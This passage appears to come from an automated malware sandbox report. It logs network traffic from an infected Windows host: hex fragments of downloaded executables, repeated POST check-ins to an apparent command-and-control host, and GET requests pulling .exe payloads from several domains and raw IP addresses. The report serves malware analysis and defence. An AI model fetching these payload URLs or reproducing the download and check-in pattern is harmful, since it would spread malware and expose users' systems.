00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:13 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:16 GMTContent-Type: application/x-msdos-programContent-Length: 557664Connection: closeLast-Modified: Thu, 13 Jan 2022 19:20:04 GMTETag: "88260-5d57b92d7ebed"Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d6 ad 35 ab 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 24 03 00 00 2a 03 00 00 00 00 00 00 b0 06 00 00 20 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 30 08 00 00 04 00 00 1c 40 09 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 03 00 e4 01 00 00 00 80 03 00 50 29 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 69 64 61 74 61 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 70 64 61 74 61 00 00 00 10 00 00 00 70 03 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 29 03 00 00 80 03 00 30 06 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 61 00 00 80 01 00 00 b0 06 00 fc 78 01 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 18:10:18 GMTServer: Apache/2.4.38 (Win32) PHP/7.1.26Last-Modified: Fri, 14 Jan 2022 16:06:29 GMTETag: "6ff1c1-5d58cfc604e56"Accept-Ranges: bytesContent-Length: 7336385Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 58 b0 38 63 39 de 6b 63 39 de 6b 63 39 de 6b 77 52 da 6a 68 39 de 6b 77 52 dd 6a 64 39 de 6b 77 52 db 6a df 39 de 6b 05 56 23 6b 67 39 de 6b 31 4c db 6a 45 39 de 6b 31 4c da 6a 72 39 de 6b 31 4c dd 6a 6a 39 de 6b 77 52 df 6a 68 39 de 6b 63 39 df 6b e4 39 de 6b d9 4c da 6a 70 39 de 6b d9 4c dc 6a 62 39 de 6b 52 69 63 68 63 39 de 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 cb 9e e1 61 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 1d 00 36 02 00 00 54 01 00 00 00 00 00 c8 a8 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 d0 04 00 00 04 00 00 25 0a 70 00 02 00 60 81 80 84 1e 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 5b 03 00 78 00 00 00 00 b0 04 00 e3 05 00 00 00 80 04 00 e8 1d 00 00 00 00 00 00 00 00 00 00 00 c0 04 00 48 07 00 00 20 39 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 39 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 50 02 00 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 35 02 00 00 10 00 00 00 36 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 98 18 01 00 00 50 02 00 00 1a 01 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 03 01 00 00 70 03 00 00 0c 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 e8 1d 00 00 00 80 04 00 00 1e 00 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 f4 00 00 00 00 a0 04 00 00 02 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e3 05 00 00 00 b0 04 00 00 06 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 07 00 00 00 c0 04 00 00 08 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49948 version: TLS 1.0
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sasldotps.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hvxghwlm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gvuhy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xcewx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fuylvs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ejshmyhdg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fxdrjy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pmdsi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jvggxpunvp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://utujjcpga.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://anaxqk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aeoceljuvu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacy-tools-for-you-780.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tavpv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ylklohfb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://snjxprkrs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ognsyxbqt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mqsidiop.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ffjbt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xhmgc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dlrkn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hqphi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 307Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hrbkqnyvuq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oanyhf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ebkix.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kglcf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ralhhxo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ucqxo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rvrxkhapq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tmefv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ublgjca.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 172Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uauswjxvxi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ihlanbec.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ocvhk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bunksfs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bhqyvtr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vvcoavsyoi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mgspnorl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 251Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jlttjsjsn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lwmkqmxs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 337Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wodlytuu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 152Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://opwshtlv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iofaey.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ndvhcbnqxy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://slwqa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 232Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mudbgksxf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ltpsu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lkdybspw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tumar.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dxlbaxnq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 224Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /l3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 81.163.30.181
